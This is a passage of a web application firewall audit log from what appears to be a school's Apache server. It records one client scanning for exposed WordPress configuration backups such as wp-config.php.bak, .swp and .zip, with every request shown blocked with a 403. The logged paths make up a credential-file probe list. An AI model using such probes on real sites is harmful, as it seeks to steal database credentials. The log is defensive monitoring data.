"/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935779073123 663 (- - -) Stopwatch2: 1744935779073123 663; combined=268, p1=236, p2=0, p3=0, p4=0, p5=32, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5063d87d-Z-- --11537a71-A-- [18/Apr/2025:07:22:59 +0700] aAGbYzpR4B6O-aqWibPQPwAAAJY 103.236.140.4 52360 103.236.140.4 8181 --11537a71-B-- GET /wp-config.php.dist HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.18.US Safari/537.36 Accept: */* --11537a71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11537a71-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935779105658 790 (- - -) Stopwatch2: 1744935779105658 790; combined=332, p1=297, p2=0, p3=0, p4=0, p5=35, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11537a71-Z-- --2232f32d-A-- [18/Apr/2025:07:22:59 +0700] aAGbYzpR4B6O-aqWibPQQAAAAI8 103.236.140.4 52362 103.236.140.4 8181 --2232f32d-B-- GET /wp-config.txt HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: */* --2232f32d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2232f32d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.txt" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935779137139 662 (- - -) Stopwatch2: 1744935779137139 662; combined=268, p1=236, p2=0, p3=0, p4=0, p5=32, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2232f32d-Z-- --1c1d8633-A-- [18/Apr/2025:07:22:59 +0700] aAGbYzpR4B6O-aqWibPQQQAAAJU 103.236.140.4 52364 103.236.140.4 8181 --1c1d8633-B-- GET /wp-config.php.txt HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0 Accept: */* --1c1d8633-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c1d8633-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935779169855 12927 (- - -) Stopwatch2: 1744935779169855 12927; combined=24766, p1=214, p2=0, p3=0, p4=0, p5=12298, sr=64, sw=0, l=0, gc=12254 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c1d8633-Z-- --207b851f-A-- [18/Apr/2025:07:22:59 +0700] aAGbYzpR4B6O-aqWibPQQgAAAIA 103.236.140.4 52366 103.236.140.4 8181 --207b851f-B-- GET /wp-config.php.backup HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Accept: */* --207b851f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --207b851f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935779204813 732 (- - -) Stopwatch2: 1744935779204813 732; combined=274, p1=241, p2=0, p3=0, p4=0, p5=33, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --207b851f-Z-- --ef981949-A-- [18/Apr/2025:07:22:59 +0700] aAGbYzlhhbF_BYhFYTXhEwAAAE4 103.236.140.4 52370 103.236.140.4 8181 --ef981949-B-- GET /wp-config.php_bck HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 Accept: */* --ef981949-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ef981949-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935779506812 689 (- - -) Stopwatch2: 1744935779506812 689; combined=263, p1=230, p2=0, p3=0, p4=0, p5=33, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ef981949-Z-- --c66c8e22-A-- [18/Apr/2025:07:22:59 +0700] aAGbYzpR4B6O-aqWibPQRAAAAJg 103.236.140.4 52372 103.236.140.4 8181 --c66c8e22-B-- GET /wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36 Accept: */* --c66c8e22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c66c8e22-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935779537896 653 (- - -) Stopwatch2: 1744935779537896 653; combined=249, p1=218, p2=0, p3=0, p4=0, p5=31, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c66c8e22-Z-- --ca9b1523-A-- [18/Apr/2025:07:23:00 +0700] aAGbZDlhhbF_BYhFYTXhGAAAAFY 103.236.140.4 52388 103.236.140.4 8181 --ca9b1523-B-- GET /.wp-config.php.swp HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2 Accept: */* --ca9b1523-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca9b1523-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935780868248 747 (- - -) Stopwatch2: 1744935780868248 747; combined=302, p1=270, p2=0, p3=0, p4=0, p5=32, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca9b1523-Z-- --fcbe675d-A-- [18/Apr/2025:07:23:00 +0700] aAGbZFyj-eUTITfvHEUkCgAAAA0 103.236.140.4 52390 103.236.140.4 8181 --fcbe675d-B-- GET /wp-config.php.swo HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; BNTV600 Build/IMM76L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Safari/537.36 Accept: */* --fcbe675d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fcbe675d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935780900094 785 (- - -) Stopwatch2: 1744935780900094 785; combined=346, p1=311, p2=0, p3=0, p4=0, p5=34, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fcbe675d-Z-- --e6953331-A-- [18/Apr/2025:07:23:01 +0700] aAGbZRk6uTiIdxrJEES4kgAAAMs 103.236.140.4 52398 103.236.140.4 8181 --e6953331-B-- GET /wp-config.php_bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.3; WOW64; Trident/7.0) Accept: */* --e6953331-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6953331-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935781198126 832 (- - -) Stopwatch2: 1744935781198126 832; combined=367, p1=332, p2=0, p3=0, p4=0, p5=35, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6953331-Z-- --40a6ad1a-A-- [18/Apr/2025:07:23:01 +0700] aAGbZRk6uTiIdxrJEES4kwAAANE 103.236.140.4 52400 103.236.140.4 8181 --40a6ad1a-B-- GET /wp-config.php-bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 Accept: */* --40a6ad1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40a6ad1a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935781234512 707 (- - -) Stopwatch2: 1744935781234512 707; combined=304, p1=271, p2=0, p3=0, p4=0, p5=33, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40a6ad1a-Z-- --c96c3c30-A-- [18/Apr/2025:07:23:02 +0700] aAGbZhk6uTiIdxrJEES4lwAAAMM 103.236.140.4 52412 103.236.140.4 8181 --c96c3c30-B-- GET /wp-config.php.zip HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Accept: */* --c96c3c30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c96c3c30-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935782080034 785 (- - -) Stopwatch2: 1744935782080034 785; combined=305, p1=270, p2=0, p3=0, p4=0, p5=35, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c96c3c30-Z-- --81bf9607-A-- [18/Apr/2025:07:23:04 +0700] aAGbaDlhhbF_BYhFYTXhHAAAAEc 103.236.140.4 52432 103.236.140.4 8181 --81bf9607-B-- GET /config.db HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 Accept: */* --81bf9607-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81bf9607-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".db"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744935784107321 2170 (- - -) Stopwatch2: 1744935784107321 2170; combined=709, p1=363, p2=313, p3=0, p4=0, p5=32, sr=106, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81bf9607-Z-- --b8da3172-A-- [18/Apr/2025:07:23:04 +0700] aAGbaDlhhbF_BYhFYTXhHQAAAFg 103.236.140.4 52444 103.236.140.4 8181 --b8da3172-B-- GET /config.old HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 Accept: */* --b8da3172-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8da3172-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744935784946127 1855 (- - -) Stopwatch2: 1744935784946127 1855; combined=659, p1=339, p2=294, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8da3172-Z-- --16e04b10-A-- [18/Apr/2025:07:23:04 +0700] aAGbaDlhhbF_BYhFYTXhHgAAAEM 103.236.140.4 52446 103.236.140.4 8181 --16e04b10-B-- GET /config.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0 Accept: */* --16e04b10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --16e04b10-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744935784980245 1901 (- - -) Stopwatch2: 1744935784980245 1901; combined=664, p1=324, p2=308, p3=0, p4=0, p5=32, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16e04b10-Z-- --3c4df917-A-- [18/Apr/2025:07:23:05 +0700] aAGbaTpR4B6O-aqWibPQTAAAAJE 103.236.140.4 52448 103.236.140.4 8181 --3c4df917-B-- GET /config.db HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-T217S Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36 Accept: */* --3c4df917-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c4df917-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".db"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744935785017980 1656 (- - -) Stopwatch2: 1744935785017980 1656; combined=651, p1=330, p2=293, p3=0, p4=0, p5=28, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c4df917-Z-- --6d3b8171-A-- [18/Apr/2025:07:23:05 +0700] aAGbaTpR4B6O-aqWibPQTQAAAJI 103.236.140.4 52452 103.236.140.4 8181 --6d3b8171-B-- GET /wp-config.php_old2010 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: */* --6d3b8171-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d3b8171-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935785332778 680 (- - -) Stopwatch2: 1744935785332778 680; combined=251, p1=220, p2=0, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d3b8171-Z-- --6dd38d39-A-- [18/Apr/2025:07:23:05 +0700] aAGbaTpR4B6O-aqWibPQTgAAAI0 103.236.140.4 52458 103.236.140.4 8181 --6dd38d39-B-- GET /admin/wp-config.phpb HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGLK430 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Safari/537.36 Accept: */* --6dd38d39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6dd38d39-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935785366102 699 (- - -) Stopwatch2: 1744935785366102 699; combined=286, p1=254, p2=0, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6dd38d39-Z-- --92a6507c-A-- [18/Apr/2025:07:23:05 +0700] aAGbaTpR4B6O-aqWibPQTwAAAJM 103.236.140.4 52460 103.236.140.4 8181 --92a6507c-B-- GET /admin/wp-config.php-old HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H321 Accept: */* --92a6507c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --92a6507c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935785398058 669 (- - -) Stopwatch2: 1744935785398058 669; combined=269, p1=237, p2=0, p3=0, p4=0, p5=32, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
